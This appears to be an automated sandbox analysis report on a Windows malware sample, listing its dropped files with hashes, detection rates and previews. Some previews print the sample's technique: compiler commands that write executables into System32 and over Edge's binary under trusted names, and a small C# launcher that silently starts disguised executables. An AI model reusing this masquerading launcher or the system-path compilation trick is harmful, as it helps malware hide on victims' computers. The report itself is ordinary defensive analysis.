                                                                  SHA-512:DD95AD4B8803EBB7426545F973544DE3D262C62B7BE6EF2769852E66777463FE9457356D5D4EA3E3A57175BFA7172A14DBBEAB1961933821E9761FFBCD2F60B9
                                                                  Malicious:false
                                                                  Preview:.C:\blockcomSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                  C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.0.cs

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                  Category:dropped
                                                                  Size (bytes):404
                                                                  Entropy (8bit):5.0377442448891125
                                                                  Encrypted:false
                                                                  SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6FWaiFkD:JNVQIbSfhWLzIiFkMSfhWA7FkD
                                                                  MD5:5789E05818A6F95850DA7807889902FD
                                                                  SHA1:10CC8E32D2260E5533CB6086B6645442A567E601
                                                                  SHA-256:051C97BE0B64E5E8909865F9B3E759FF9A989A43FBAF283FB8FC1CD4DAD9993C
                                                                  SHA-512:38D97BA0E8272D1FF890B76A441DBE3FE63B62A7EBD9FAA1CE2F125A111B5DA7D1185A2C79DD6FE13DE10176280FC48885F4E8F7C1C989334BABDF336E788B59
                                                                  Malicious:false
                                                                  Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe"); } catch { } }).Start();. }.}.

                                                                  C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):266
                                                                  Entropy (8bit):5.154498425014157
                                                                  Encrypted:false
                                                                  SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fE4VBn:Hu7L//TRRzscQyn/
                                                                  MD5:0FE78B7C63FCED35143B43A2CE77F859
                                                                  SHA1:AB40C85C37D395C49F6A141090B6DD4F1953A9BE
                                                                  SHA-256:461F3171D54E76369E4E8838395B313233D5CBDD8487CCD3069954BE183BFBDE
                                                                  SHA-512:554EA5D54AA931EB92537F43EC748D5624CCEC3C84C751D44ABE919C9997B09F1805FBBBD8E2B0464561FB70F341ECB82117883CC70FD41B758D5FA22C84C3A6
                                                                  Malicious:true
                                                                  Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.0.cs"

                                                                  C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.out

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
                                                                  Category:modified
                                                                  Size (bytes):762
                                                                  Entropy (8bit):5.2584987604588695
                                                                  Encrypted:false
                                                                  SSDEEP:12:lI/u7L//TRRzscQynmKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:lI/un/VRzstynmKax5DqBVKVrdFAMBJj
                                                                  MD5:2864B51CAB8CBE245483AA440E810165
                                                                  SHA1:48E7380FFA40FE5D76B77E925C5D4AECD528E6C0
                                                                  SHA-256:AB0D9B81AEDAE585BA05AFD43F34B64E15B801BC5A81DDE3BEFCAA69E12A6B55
                                                                  SHA-512:1EE539C69889F5DE2D74EE6C33385C637973A199F73A98425DB879432D0AD0617A52244EE7C17DDC33424DA90C58DF27B7F4569B25400B8358115410B11017A4
                                                                  Malicious:false
                                                                  Preview:.C:\blockcomSession> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                  C:\Users\user\AppData\Local\Temp\rXoD4iCVCH

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.133660689688185
                                                                  Encrypted:false
                                                                  SSDEEP:3:dVwwt97E4DHn:daOH
                                                                  MD5:7339575A9A4751FDA40538F2321C479F
                                                                  SHA1:54919F84C7F97A8DF30EBF6FD2C0A766739F4A13
                                                                  SHA-256:8222C5C6EB4643EBA42A14077A4A82207FC4CD7E9D6ED3B19B17555BDDD5FB4B
                                                                  SHA-512:F77D7B8BB0BF2F1737986DCD1E6B5D29D39BB4D000701B7E101AEBBEF3A3A9900EE29133B7317935199AB3A6491927208FADFA16C9D7C889CE950B6CEBEE1449
                                                                  Malicious:false
                                                                  Preview:uKMYpMvKXaUsyfHXawa2NRqfb

                                                                  C:\Users\user\AppData\Local\Temp\xpdzEAJnC2

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.323856189774724
                                                                  Encrypted:false
                                                                  SSDEEP:3:m8BycKO:nzt
                                                                  MD5:F3B9CCDC019368D3AB88FB3BD3D84CB0
                                                                  SHA1:AD09FE5B944926B30BDF40DB2D779BD77B739BB8
                                                                  SHA-256:129BBEC07BAF0C237D22A2B25E8D7FF3A8761F081050EC99FCC9C4B4D94DEAC0
                                                                  SHA-512:5DD383A367CBFC0BCBCBB79C047F3360C13B224916674A1D92C0E0DA67FA98EF0ED61713D176F5705AADBF10E4FEEA2B0CD55D54F3D9EA3C99C11AE0D5984D8C
                                                                  Malicious:false
                                                                  Preview:OnvFga5YCwEgvqLy4JwBXMYQ1

                                                                  C:\Users\user\Desktop\GgZbKUMi.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Joe Sandbox View:
                                                                  • Filename: OneDriveStandaloneUpdater.exe, Detection: malicious, Browse
                                                                  • Filename: 85D5ktqjpd.exe, Detection: malicious, Browse
                                                                  • Filename: VIyu4dC9CU.exe, Detection: malicious, Browse
                                                                  • Filename: top.exe, Detection: malicious, Browse
                                                                  • Filename: DC86.exe, Detection: malicious, Browse
                                                                  • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                  • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                  • Filename: loader.exe, Detection: malicious, Browse
                                                                  • Filename: hz7DzW2Yop.exe, Detection: malicious, Browse
                                                                  • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\HTJtRROP.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\LTranRbW.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PRRjZxCV.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RLUzQxgL.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RUDRugHQ.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\VquIdqjl.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\eTDxNkzS.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 38%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\jPEOVQoM.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\nCWNxMEA.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):5.645950918301459
                                                                  Encrypted:false
                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ucFnGTXv.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\mQBLhXIPAJ.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\yCQlabwB.log

                                                                  Download File
                                                                  Process:C:\blockcomSession\containerReview.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32768
                                                                  Entropy (8bit):5.645950918301459
                                                                  Encrypted:false
                                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP

                                                                  Download File
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):1224
                                                                  Entropy (8bit):4.435108676655666
                                                                  Encrypted:false
                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                  Malicious:false
                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                  C:\Windows\System32\SecurityHealthSystray.exe

                                                                  Download File
